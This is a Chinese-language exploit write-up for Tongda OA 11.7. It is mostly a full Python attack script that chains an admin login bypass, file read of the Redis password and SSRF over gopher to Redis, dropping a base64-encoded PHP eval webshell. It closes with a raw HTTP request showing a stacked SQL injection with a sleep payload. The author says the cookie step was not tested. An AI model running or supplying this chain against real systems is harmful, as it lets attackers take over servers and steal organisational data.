通达OA11.7 利用新思路(附EXP)
前言
炒个冷饭。都是垃圾小洞组合在一起。
任意用户登陆+获取安装目录+任意文件读取+ssrf-->redis -->写入文件-->getshell
一、 通过任意用户登陆拿到管理员的cookie
二、获取安装目录读取redis 配置文件
三、 ssrf 写入文件
四、getshell
通过任意用户登陆拿到管理员的cookie
通达OA 任意用户登陆条件需要管理员在线
http://192.168.1.22/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
访问路径,覆盖了session直接用cookie登陆,访问目录/general/进入后台
这里已经登陆了。打开无痕模式
如果他什么都没有返回,说明是OK的。那么就利用当前的phpsessid进行访问
如果出现RELOGIN那说明。管理员不在线漏洞形成的过程
这里查询了UID 是否在线。CLIENT 默认为0 这个0代表浏览器
这个表存的是当前用户的登陆信息。UID 和时间。sid 是phpssion 的值。然后client 是客户端标识符。
获取安装目录读取redis 配置文件
/general/approve_center/archive/getTableStruc.php
首先是任意文件读取
/ispirit/im/photo.php?AVATAR_FILE=D:/MYOA/bin/redis.windows.conf&UID=2
读取到redis 密码。然后通过ssrf
/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=gopher://127.0.0.1:6399/
完整exp
如下:
# -*- coding:utf-8 -*-
import os
import requests
import re
# author :print("")
import urllib
class GenerateUrl:
def __init__(self, password, webroot, filename):
self.password = password
self.webroot = webroot
self.filename = filename
self.webshell = '''
<?php file_put_contents('11.php',base64_decode('PD9waHAgQGV2YWwoJF9HRVRbMV0pPz4='))?>
'''
self.template = '''_*2
$4
AUTH
${password_len}
{password}
*1
$8
flushall
*4
$6
CONFIG
$3
SET
$10
dbfilename
${filename_len}
{filename}
*4
$6
CONFIG
$3
SET
$3
dir
${webroot_len}
{webroot}
*3
$3
SET
$1
1
${content_len}
{content}
*1
$4
save
*1
$4
quit
'''
def __str__(self):
webshell = self.webshell
webshell = webshell.replace('"', '%22').replace("'", '%27').replace(",", "%2c")
webshell = webshell.replace(' ', '%20').replace('\n', '%0D%0A').replace('<', '%3c').replace('?', '%3f').replace(
'>', '%3e')
self.template = self.template.replace("{password_len}", str(len(self.password)))
self.template = self.template.replace("{password}", self.password)
self.template = self.template.replace("{filename_len}", str(len(self.filename)))
self.template = self.template.replace("{filename}", self.filename)
self.template = self.template.replace("{webroot_len}", str(len(self.webroot)))
self.template = self.template.replace("{webroot}", self.webroot)
self.template = self.template.replace("{content_len}", str(len(self.webshell)))
self.template = self.template.replace("{content}", webshell)
self.template = self.template.replace('\n', '%0D%0A')
return urllib.quote_plus(self.template)
proxies = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080",
}
def headers(phpsesion):
return {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) ",
"Cookie": phpsesion
}
# 获取绝对目录
def get_path(url, headers):
urlc = url
url = (url + '/general/approve_center/archive/getTableStruc.php')
try:
data = requests.get(url=url, headers=headers, proxies=proxies).json()
path = data['logPath'].split('\\')[0]
url2 = urlc + '/ispirit/im/photo.php?AVATAR_FILE=%s/bin/redis.windows.conf&UID=2' % path
data2 = requests.get(url=url2, headers=headers, proxies=proxies)
ress = re.search('requirepass .+', data2.text).group()
return {"path": path, "redis_pass": ress.replace('requirepass ', '').strip()}
except:
exit('ERROR Cookie PHPSESSID expired')
# ssrf写入文件
def ssrf_webshell(url, path, password):
urlc = url
path = path
password = password
a = GenerateUrl(password, path + "/webroot/", "666.php")
url = url + '/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=%s' % ('gopher://127.0.0.1:6399/' + str(a))
data = requests.get(url=url, headers=headers, proxies=proxies)
ddd = requests.get(url=urlc + '/666.php')
if ddd.status_code == 200:
print('shell url:%s' % urlc + '/666.php')
else:
print('send shell ERROR')
return True
def get_cookie(url):
url = url+ "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
try:
response = requests.get(url=url, headers=headers)
if "RELOGIN" in response.text and response.status_code == 200:
exit("目标用户为离线状态")
elif response.status_code == 200 and response.text == "":
print("好了马上就能getshell了")
cookies = response.cookies
cookie = requests.utils.dict_from_cookiejar(cookies)
if cookie['SESSIONID']:
return cookie['SESSIONID']
else:
exit('实在抱歉,getshell不了')
else:
print("未知错误,目标可能不存在或不存在该漏洞")
except Exception as e:
exit('实在抱歉,getshell不了')
if __name__ == '__main__':
import sys
try:
url = sys.argv[1]
cookie =get_cookie(url)
headers = headers(cookie)
root_path = get_path(url, headers)
ssrf_webshell(url, root_path['path'], root_path['redis_pass'])
except:
print('python tongda.py http://127.0.0.1')
没有测试那个获取cookie 那个地方。这个需要如果测试中出现意外改改吧。纯演示思路
分享一个后台SQL 注入的点
这里支持堆叠注入。首先需要获取到通达OA的安装目录。然后into 写入shell 即可。=。=
POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1
Host:
10.211.55.5
Content-Length: 39
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.103 Safar
i/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin:
http://10.211.55.5
Referer:
http://10.211.55.5/general/officeProduct/product_apply/index.php
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: SID_12=530bf0a5; SID_27=7202df24; USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=1plu8qbupnesf40l9d02fdlvm5
; SID_1=24205621
Connection: close
arr[5][pro_id]=151';select sleep(3) %23